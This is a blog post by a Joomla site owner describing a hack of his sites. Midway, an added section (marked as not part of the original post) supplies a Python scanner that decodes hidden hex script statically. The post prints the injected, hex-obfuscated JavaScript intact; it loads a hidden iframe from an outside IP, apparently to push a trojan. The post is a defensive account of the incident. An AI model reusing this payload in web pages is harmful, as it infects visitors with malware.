Joomla! Sites Hacked
Both of my Joomla! sites were hacked yesterday. I’m not yet sure what the vector was, whether it was the Joomla! core, or one of the components/extensions I use.
The first I knew of it was when visiting the sites resulted in:
Parse error: syntax error, unexpected '<' in /mnt/local/home/timhaughton/homedocumentmanager.com/index.php on line 89
A look at line 89 gives this:
echo JResponse::toString($mainframe->getCfg('gzip'));
v497b1ee5c5c25(v497b1ee5caa4e){ return(parseInt(v497b1ee5caa4e,16));}
function v497b1ee5d962d(v497b1ee5de2cb){ var v497b1ee5e30f9='';
for(v497b1ee5e7f0e=0; v497b1ee5e7f0e<v497b1ee5de2cb.length; v497b1ee5e7f0e+=2){
v497b1ee5e30f9+=(String.fromCharCode(v497b1ee5c5c25(v497b1ee5de2cb.substr(v497b1ee5e7f0e, 2))));}
return v497b1ee5e30f9;}
document.write(v497b1ee5d962d(‘3C5343524950543E77696E646F772E7374617475733D27446
F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6130207372633
D5C27687474703A2F2F3131362E35302E31352E32352F73746174732F3F272B4D6174682E726F756
E64284D6174682E72616E646F6D28292A3739393638292B2739613936306131305C2720776964746
83D353838206865696768743D313336207374796C653D5C27646973706C61793A206E6F6E655C273
E3C2F696672616D653E27293C2F5343524950543E‘));
After consulting someone far more knowledgeable than myself, I’m told that the script is trying to install a trojan by downloading a corrupt PDF. Deep wholesome joy.
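The injected script above hides its markup as a hex string that is turned back into characters with parseInt(…, 16) and String.fromCharCode before being handed to document.write. As an added example (not part of the original post), this Python code decodes such literals statically, without running the script, and reports the ones that unpack to script or iframe markup; the sample file contents, the `dec` function name and the bad.example.invalid host are constructed for illustration.

```python
import re

# A quoted run of at least 20 hex byte pairs, the shape of the injected literal.
HEX_LITERAL = re.compile(r"""['"]((?:[0-9A-Fa-f]{2}){20,})['"]""")
# Markup that should never come out of a decoded string in index.php.
SUSPICIOUS = re.compile(r"<\s*(?:script|iframe)\b", re.IGNORECASE)
# src= value, allowing the backslash-escaped quote the injected script uses.
SRC_ATTR = re.compile(r"""src\s*=\s*\\?['"]?([^'"\\\s>+]+)""", re.IGNORECASE)


def defang(url):
    """Make a URL safe to paste into a ticket or report."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def scan_text(text):
    """Decode hex literals statically; report those hiding script/iframe markup."""
    findings = []
    for match in HEX_LITERAL.finditer(text):
        decoded = bytes.fromhex(match.group(1)).decode("latin-1")
        if not SUSPICIOUS.search(decoded):
            continue  # e.g. an ordinary SHA-1 checksum
        findings.append({
            "line": text.count("\n", 0, match.start()) + 1,
            "decoded": decoded,
            "urls": [defang(u) for u in SRC_ATTR.findall(decoded)],
        })
    return findings


# Constructed sample, not the payload from the post.
_PAYLOAD = ("<SCRIPT>document.write('<iframe src=\\'http://bad.example.invalid/stats/?\\' "
            "style=\\'display: none\\'></iframe>')</SCRIPT>")
SAMPLE_INDEX_PHP = (
    "<?php\n"
    "$sha1 = 'da39a3ee5e6b4b0d3255bfef95601890afd80709';\n"
    "echo JResponse::toString($mainframe->getCfg('gzip'));\n"
    "<script>document.write(dec('" + _PAYLOAD.encode().hex().upper() + "'));</script>\n"
)

if __name__ == "__main__":
    for f in scan_text(SAMPLE_INDEX_PHP):
        print(f"line {f['line']}: {f['decoded']}")
        print("  loads:", ", ".join(f["urls"]))
```

Running the same function over every PHP file in the web root, not just index.php, shows whether the injection was written anywhere else.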
It’s the second time this has happened. It doesn’t seem to cause any real issue other than I have to replace the index.php file. The hack is pretty clumsy in that it doesn’t leave a working site to spread the trojan, since there’s a syntax error. This is good, as it means I shouldn’t be flagged as having malware on the site. But will it always be clumsy?
It would be a pain to have to replace the Joomla! site with a hand crafted one.